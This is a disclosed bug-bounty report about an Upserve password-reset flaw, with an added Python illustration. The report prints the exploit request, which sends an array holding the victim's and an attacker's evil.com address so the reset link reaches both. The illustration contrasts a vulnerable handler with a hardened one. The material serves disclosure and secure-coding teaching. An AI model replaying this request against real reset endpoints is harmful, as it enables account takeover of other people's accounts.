Upserve : Ability to reset password for account

2018-03-06T21:45:51
ID H1:322985
Type hackerone
Reporter exadmin
Modified 2019-06-06T20:30:51

Description

The attacker was able to send a password reset link to an arbitrary email by sending an array of email addresses instead of a single email address.

POST https://hq.breadcrumb.com/api/v1/password_reset HTTP/1.1 with body like {"email_address":["admin@breadcrumb.com","attacker@evil.com"]}
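The root cause described above is a JSON field that is never checked to be a single string, so an array reaches the reset logic and every address in it receives the link. The following is an added illustration, not Upserve's code or anything from the report: a minimal model of that bug class beside a hardened handler that rejects non-string values and mails the link only to the address stored on the account. The account table, the `email_address` handling, the response format and the outbox abstraction are all constructed assumptions for the example.

```python
import re
import secrets

# Constructed sample account table for the example (not real data).
ACCOUNTS = {
    "admin@example.com": {"id": 1, "email": "admin@example.com"},
    "user@example.com": {"id": 2, "email": "user@example.com"},
}

# Deliberately simple address check; real services should use a proper validator.
EMAIL_RE = re.compile(r"^[^@\s]+@[^@\s]+\.[^@\s]+$")


class InvalidRequest(ValueError):
    """Raised when the request body does not carry exactly one email string."""


def parse_email_field(body):
    """Accept only a single string in email_address; reject lists, dicts, numbers.

    This is the check that is missing in the reported behaviour: JSON lets the
    client send ["a@x", "b@y"] where the server expects "a@x".
    """
    value = body.get("email_address")
    if not isinstance(value, str):
        raise InvalidRequest("email_address must be a single string")
    value = value.strip().lower()
    if len(value) > 254 or not EMAIL_RE.match(value):
        raise InvalidRequest("email_address is not a valid address")
    return value


def vulnerable_reset(body, accounts, outbox):
    """Simplified model of the bug class (an assumption, not the vendor's code).

    The submitted value is used as given: a list is treated as a set of
    candidates, and if any of them matches an account the reset token is
    mailed to every address in the list, including attacker-controlled ones.
    """
    value = body.get("email_address")
    candidates = value if isinstance(value, list) else [value]
    matched = [c for c in candidates if c in accounts]
    if matched:
        token = secrets.token_urlsafe(32)
        for addr in candidates:
            outbox.append((addr, token))  # token leaks to the extra address
    return bool(matched)


def safe_reset(body, accounts, outbox):
    """Hardened handler: strict input type, link sent only to the stored address.

    Returns a small response dict so callers (and tests) can inspect the outcome.
    """
    try:
        email = parse_email_field(body)
    except InvalidRequest as exc:
        return {"status": 400, "error": str(exc)}

    account = accounts.get(email)
    if account is not None:
        token = secrets.token_urlsafe(32)
        # Use the address on record, never the value the client submitted.
        outbox.append((account["email"], token))

    # Same response whether or not the account exists, to avoid enumeration.
    return {"status": 202, "message": "If that address exists, a reset link has been sent."}


if __name__ == "__main__":
    # Constructed request body shaped like the one in the report.
    array_body = {"email_address": ["admin@example.com", "attacker@example.net"]}

    leaked = []
    vulnerable_reset(array_body, ACCOUNTS, leaked)
    print("vulnerable model mailed:", [addr for addr, _ in leaked])

    sent = []
    print("hardened handler:", safe_reset(array_body, ACCOUNTS, sent), "mailed:", sent)
```

The two checks that matter are the type check in `parse_email_field` and the use of `account["email"]` as the recipient; either alone closes the reported hole, and together they also cover a string value that merely resembles the stored address.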